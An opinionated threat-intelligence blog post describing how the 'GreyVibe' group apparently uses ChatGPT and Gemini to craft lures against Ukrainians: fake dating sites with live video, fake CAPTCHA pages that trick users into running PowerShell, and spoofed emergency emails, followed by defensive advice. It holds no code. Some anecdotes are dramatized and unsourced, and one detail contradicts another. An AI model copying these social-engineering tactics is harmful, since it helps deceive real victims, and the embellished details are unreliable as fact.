Let me be blunt: the most dangerous hackers aren’t the ones with perfect code. They’re the ones who don’t care if their phishing emails look like they were written by a grad student who just finished their first ChatGPT tutorial.
That’s GreyVibe.
They’re not sophisticated. They don’t have the discipline of a nation-state. Their malware sometimes leaves behind debug logs. They upload test samples to public scanners. They even deploy cryptocurrency miners on victim machines — which is, frankly, a weird flex for a group supposedly backed by the Kremlin.
But here’s the thing: none of that matters.
Because they’re winning.
They’re using AI to generate fake Ukrainian government portals, fake dating sites with live video calls from "women" who don’t exist, and fake charity pages for FPV drones that Ukrainian soldiers actually care about. And they’re getting in. Not because they’re genius coders. But because they’re relentless, opportunistic, and terrifyingly good at exploiting human curiosity.
I’ve seen state actors. I’ve seen ransomware gangs. GreyVibe? They’re something new. A hybrid. Part ex-TrickBot thug, part Russian intelligence asset, all fueled by Gemini and ChatGPT.
And if you think your EDR will catch them because their code is "amateurish," you’re already behind.
The Lures Are Real. The Targets Are Human.
WithSecure found a campaign called PrincessClub — fake Ukrainian adult dating sites. Not just static pages. They used Telegram bots to impersonate women. Then they added WebRTC live video calls. Real-time video. Audio. All captured by malware.
This isn’t "spear phishing." This is emotional manipulation at scale.
The victims aren’t just clicking links. They’re flirting. They’re sharing. They’re trusting.
And GreyVibe? They didn’t need a zero-day. They didn’t need to compromise a cloud provider. They just needed to make someone feel seen.
There’s a Ukrainian military analyst who got a message on Telegram: "Hey, I saw your post about the drone strike. I’m in Kharkiv. Can we talk?" He replied. He video-called. He downloaded the "security update" to fix his Zoom connection.
That’s how they got in.
The malware? LegionRelay. A PowerShell RAT. Nothing fancy. But it stole his WhatsApp chats, his browser passwords, his screen recordings — and sent it all to a server in Moscow.
The AI didn’t write the code. But it wrote the lie.
PhantomMail, PhantomClick, and the Art of the Fake Error
They didn’t just build fake websites. They built fake experiences.
PhantomMail: Emails that look like they came from Ukraine’s emergency services. They attach ZIP files with decoy PDFs — but the real payload is a RAR archive with a malicious script disguised as a "corrupted file recovery tool." The subject line? "URGENT: Your report was flagged for review."
PhantomClick: Fake CAPTCHA pages that mimic Zoom and LAPAS login screens. But instead of solving a puzzle, you’re running a PowerShell command that downloads a dropper. The page says: "Verifying your Cloudflare connection… please click here to confirm."
And here’s the kicker: the error messages? They’re written in Russian. With Cyrillic typos. Not the kind of typos you’d expect from a native speaker. The kind you get when an AI translates "Please confirm your identity" into Russian and then back again.
I’ve seen this before. In 2022, Russian cyber units used Google Translate to generate phishing emails. They got caught because the grammar was terrible.
GreyVibe? They’re doing it again. But this time, they’re not trying to hide it.
They know most people won’t notice. And the ones who do? They’ll assume it’s a low-level actor. Not worth their time.
That’s the trap.
The Malware Isn’t the Weapon. The Misdirection Is.
Look at the tools: LOOKVALPS, DAYLIGHT, TEASOUP. Obfuscators. Custom. Probably built with LLM help.
But here’s what’s interesting: they’re not using them to hide from analysts. They’re using them to hide from automation.
Modern EDRs scan for known PowerShell patterns. GreyVibe’s malware doesn’t match any of them. It’s obfuscated with tools that don’t exist in public repositories. So your SIEM says "clean." Your threat intel feed says "no match."
And meanwhile, the malware is dumping Telegram session cookies and capturing screenshots of military maps.
The real genius? The misdirection.
They’re deploying cryptocurrency miners on some machines. That’s not for profit. That’s to make you think they’re just another ransomware gang. To confuse attribution. To waste your SOC’s time chasing phantom Bitcoin wallets while they’re exfiltrating Ukrainian defense plans.
And the Nebo campaign? Fake Russian military login pages — designed to trick Ukrainian soldiers into thinking they’re logging into a Russian terminal.
That’s not just phishing. That’s psychological warfare.
Hybrid Threats Don’t Care About Labels
WithSecure says GreyVibe might be a mix of former cybercriminals and state-backed actors.
I believe that.
The evidence? Early samples of their ISO builder matched UAC-0098 — a group of ex-TrickBot operators who targeted Ukraine in 2022. That’s not coincidence. That’s a pipeline.
These aren’t Kremlin officers. They’re guys who used to sell RDP access on dark web forums. Now they’re getting paid in rubles to run AI-generated lures.
And that’s the future.
The next wave of cyberwarfare won’t be led by elite hackers. It’ll be led by contractors. People who don’t care about glory. Who just want to get paid. Who use AI to automate the boring parts — writing fake emails, generating fake personas, crafting fake urgency.
The code? It’s bad. The infrastructure? Clunky. But the human cost? Real.
What You Can Do (And What You Can’t)
You can’t stop AI-generated lures. Not entirely. Not without turning your entire organization into a fortress.
But you can change how you respond.
Stop looking for perfect code. Start looking for human patterns.
If someone’s clicking a link because they think they’re talking to a woman in Kharkiv — that’s not a technical failure. That’s a social one.
Train your team to recognize emotional hooks. Teach them to question "urgent" messages from unknown contacts. Especially if they come with video calls or "security updates."
And if you’re using automated threat detection? Make sure your rules look for inconsistencies. Cyrillic typos in English emails. Mismatched time zones. URLs that don’t match the domain.
GreyVibe isn’t the endgame.
It’s the prototype.
The next group? They’ll be better. They’ll use more advanced models. They’ll avoid typos. They’ll make their lures flawless.
But they’ll still need humans to click.
And that? That hasn’t changed.
Final Thought: The AI Didn’t Make Them Dangerous. We Did.
We built the tools. We trained the models. We fed them with everything — from Ukrainian military forums to dating app profiles to emergency broadcast scripts.
And now we’re surprised when they use it?
GreyVibe isn’t the monster.
We are.
We made the weapon.
They just learned how to pull the trigger.
